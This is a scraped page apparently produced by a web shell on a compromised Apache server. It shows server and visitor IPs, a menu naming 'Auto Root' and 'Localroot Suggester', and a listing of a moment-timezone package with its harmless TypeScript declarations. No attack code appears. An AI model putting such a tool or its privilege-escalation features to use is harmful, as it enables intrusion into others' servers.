Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.217.80
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
coviddata /
node_modules /
moment-timezone /
Delete
Unzip
Name
Size
Permission
Date
Action
builds
[ DIR ]
drwxr-xr-x
2026-09-03 09:25
data
[ DIR ]
drwxr-xr-x
2021-01-22 18:49
moment-timezone-utils.d.ts
2.59
KB
-rw-r--r--
1985-10-26 08:15
moment-timezone-utils.js
7.6
KB
-rw-r--r--
1985-10-26 08:15
Save
Rename
import moment = require('moment'); import { MomentTimezone } from "./index"; declare module 'moment' { /** Parsed / unpacked zone data. */ interface UnpackedZone { /** The uniquely identifying name of the time zone. */ name: string; /** zone abbreviations */ abbrs: Array<string>; /** (measured in milliseconds) */ untils: Array<number | null>; /** (measured in minutes) */ offsets: Array<number>; } /** Bundle of zone data and links for multiple timezones */ interface PackedZoneBundle { version: string; zones: Array<string>; links: Array<string>; } /** Bundle of zone data and links for multiple timezones */ interface UnpackedZoneBundle { version: string; zones: Array<UnpackedZone>; links: Array<string>; } /** extends MomentTimezone declared in index */ interface MomentTimezone { /** Converts zone data in the unpacked format to the packed format. */ pack(unpackedObject: UnpackedZone): string; /** Convert a base 10 number to a base 60 string. */ packBase60(input: number, precision?: number): string; /** Create links out of two zones that share data. * @returns A new ZoneBundle with duplicate zone data replaced by links */ createLinks(unlinked: UnpackedZoneBundle): PackedZoneBundle; /** * Filter out data for years outside a certain range. * @return a new, filtered UnPackedZone object */ filterYears(unpackedZone: UnpackedZone, startYear: number, endYear: number): UnpackedZone; /** * Filter out data for years outside a certain range. * @return a new, filtered UnPackedZone object */ filterYears(unpackedZone: UnpackedZone, startAndEndYear: number): UnpackedZone; /** * Combines packing, link creation, and subsetting of years into one simple interface. * Pass in an unpacked bundle, start year, and end year and get a filtered, linked, packed bundle back. */ filterLinkPack(unpackedBundle: UnpackedZoneBundle, startYear: number, endYear: number): PackedZoneBundle; /** * Combines packing, link creation, and subsetting of years into one simple interface. * Pass in an unpacked bundle, start year, and end year and get a filtered, linked, packed bundle back. */ filterLinkPack(unpackedBundle: UnpackedZoneBundle, startAndEndYear: number): PackedZoneBundle; } } // require("moment-timezone") === require("moment") export = moment;